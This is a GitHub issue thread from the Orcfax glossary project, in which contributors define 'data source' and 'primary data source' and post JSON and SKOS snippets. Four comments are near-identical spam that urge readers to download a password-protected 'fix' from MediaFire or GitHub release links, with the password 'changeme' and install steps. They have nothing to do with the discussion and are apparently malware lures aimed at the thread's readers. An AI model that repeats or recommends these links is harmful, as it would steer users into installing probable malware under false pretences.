### ISSUE TITLE
data source & primary data source

### ISSUE THREAD

**Issue by Christian-MK** [orcfax/glossary#31]
From peter in [discord](https://discord.com/channels/918870284331802674/1139271976154832916/1265621200994963551)
preferred label: Data source
definition: The person or organization that provides primary data to external consumers
narrower term: Primary source
related term: Source data point

**Comment by Christian-MK** [comment]
suggest to remove "primary" from def in order to make distinct from the possible entry of "Primary data source".
If this is undesirable then propose that we rework PT to "Primary data source"

**Comment by Christian-MK** [comment]
Can DEX liquidity pools be considered their own source?

From [Karsten](https://discord.com/channels/918870284331802674/1139271976154832916/1265578904639504496)
> what defines a source for Orcfax? 
The platform we're getting the data from (e.g. https://api.binance.com/api/v3/ticker/24hr)
or
The actual source we're getting the data from for a specific pair (e.g. https://api.binance.com/api/v3/ticker/ADA-USD, for example

this is where source data point https://github.com/orcfax/glossary/issues/32 is attempting to draw the s=distinction between an entity such as binance and its many sources (precise API calls) which consumers may pick from.

Could we be needlessly complicating this? I would say that the primary source is not "Binance" but the specific call, this is already how we're modeling within the record
```json
{
    "@context": "https://schema.org",
    "type": "Message",
    "name": "ADA-USD",
    "isBasedOn": {
        "@type": "MediaObject",
        "name": "Exchange data",
        "additionalType": "Central Exchange Data",
        "description": "the raw information received by an Orcfax collector from a central exchange (CEX) API"
    },
    "sender": "https://www.bitstamp.net/api/v2/ticker/adausd", // "sender" being == source
```

**Comment by gchartier** [comment]
The DEX liquidity pool is kind of a `Data Source` "aggregation method". In my mind, each individual DEX is a single `Data Source` that we use. I think the liquidity pool is also a `Data Source`. Makes sense to call the liquidity pool a `Secondary Data Source` and the DEX's `Primary Data Source`'s

**Comment by gchartier** [comment]
Is the mean value calculation of CEX Data Sources analogous in any way to what the liquidity pool is doing with the DEX Data Sources?

I think whatever we settle on for terms, those 2 things might make sense as the same term but I don't fully understand how the mechanics of the CNT liquidity pool work that @george-orcfax built works.

**Comment by ross-spencer** [comment]
> The DEX liquidity pool is kind of a Data Source "aggregation method". In my mind, each individual DEX is a single Data Source that we use. I think the liquidity pool is also a Data Source. Makes sense to call the liquidity pool a Secondary Data Source and the DEX's Primary Data Source's

For dexes this seems pretty good to me.

**Comment by Christian-MK** [comment]
```
@prefix : <http://glossary.orcfax.io/#> .
@prefix skos: <http://www.w3.org/2004/02/skos/core#> .
:dataSource
    skos:prefLabel "data source"@en;
    skos:definition '''
       A person or entity that provides access to data for use
       by others.
    ''' ;
    skos:narrower :primaryDataSource.
```

```
@prefix : <http://glossary.orcfax.io/#> .
@prefix skos: <http://www.w3.org/2004/02/skos/core#> .
:primaryDataSource
    skos:prefLabel "primary data source"@en;
    skos:definition '''
       Data collected firsthand by a person or entity during the
       course of regular activity and made available for use by
       others.

       Example:
       A CEX can be considered a primary data source when the
       price data it provides is derived from the its own order
       books and not from external data.
    ''' ;
    skos:broader :dataSource. 
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ross-spencer** [comment]
Both look good to me!

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
